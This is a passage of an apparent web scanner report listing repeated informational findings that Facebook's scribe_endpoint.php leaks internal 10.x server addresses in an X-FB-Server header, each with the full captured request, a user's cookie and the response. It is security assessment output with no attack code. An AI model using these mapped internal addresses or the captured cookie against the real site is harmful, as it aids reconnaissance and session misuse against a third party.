User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.42.150.73
X-Cnection: close
Date: Thu, 16 Jun 2011 15:26:25 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.474. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.183.45

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1406%2C%22baseline_elapsed%22%3A1406%7D&asyncSignal=141 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df388f60e9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.183.45
X-Cnection: close
Date: Thu, 16 Jun 2011 18:01:35 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.475. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.38.57

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2085%2C%22baseline_elapsed%22%3A2085%7D&asyncSignal=2984 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.38.57
X-Cnection: close
Date: Thu, 16 Jun 2011 18:37:47 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.476. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.231.50

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1068%2C%22baseline_elapsed%22%3A1286%7D&asyncSignal=2901 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1636510b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.231.50
X-Cnection: close
Date: Thu, 16 Jun 2011 13:43:05 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.477. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.186.32

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2332%2C%22baseline_elapsed%22%3A1622%7D&asyncSignal=599 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b5191e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.186.32
X-Cnection: close
Date: Thu, 16 Jun 2011 17:30:36 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.478. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.26.37

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1737%2C%22baseline_elapsed%22%3A1737%7D&asyncSignal=563 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.26.37
X-Cnection: close
Date: Thu, 16 Jun 2011 11:24:13 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.479. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.103.52

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1254%2C%22baseline_elapsed%22%3A1254%7D&asyncSignal=1947 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc1657c04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.103.52
X-Cnection: close
Date: Thu, 16 Jun 2011 15:57:26 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.480. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.188.65

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A494%2C%22baseline_elapsed%22%3A494%7D&asyncSignal=1847 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27e1b8fa8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.188.65
X-Cnection: close
Date: Thu, 16 Jun 2011 13:37:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.481. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.121.43

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2166%2C%22baseline_elapsed%22%3A698%7D&asyncSignal=5611 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.121.43
X-Cnection: close
Date: Thu, 16 Jun 2011 18:58:29 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.482. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.151.62

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1690%2C%22baseline_elapsed%22%3A1690%7D&asyncSignal=2175 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df706975%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.151.62
X-Cnection: close
Date: Thu, 16 Jun 2011 17:04:39 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.483. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.89.49

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1411%2C%22baseline_elapsed%22%3A1411%7D&asyncSignal=3255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9f0d99e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.89.49
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:45 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.484. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.122.30

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1401%2C%22baseline_elapsed%22%3A1401%7D&asyncSignal=103 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38571b054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.122.30
X-Cnection: close
Date: Thu, 16 Jun 2011 13:48:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.485. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.213.41

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1596%2C%22baseline_elapsed%22%3A1596%7D&asyncSignal=4245 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.213.41
X-Cnection: close
Date: Thu, 16 Jun 2011 16:18:02 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.486. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.172.57

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1298%2C%22baseline_elapsed%22%3A1298%7D&asyncSignal=6399 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3791e1e24%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.172.57
X-Cnection: close
Date: Thu, 16 Jun 2011 16:33:37 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.487. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.132.56

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1532%2C%22baseline_elapsed%22%3A1532%7D&asyncSignal=2361 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.132.56
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:42 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.488. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.151.47

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1942%2C%22baseline_elapsed%22%3A1942%7D&asyncSignal=6191 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.151.47
X-Cnection: close
Date: Thu, 16 Jun 2011 16:28:24 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.489. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.182.57

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A581%2C%22baseline_elapsed%22%3A581%7D&asyncSignal=7629 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
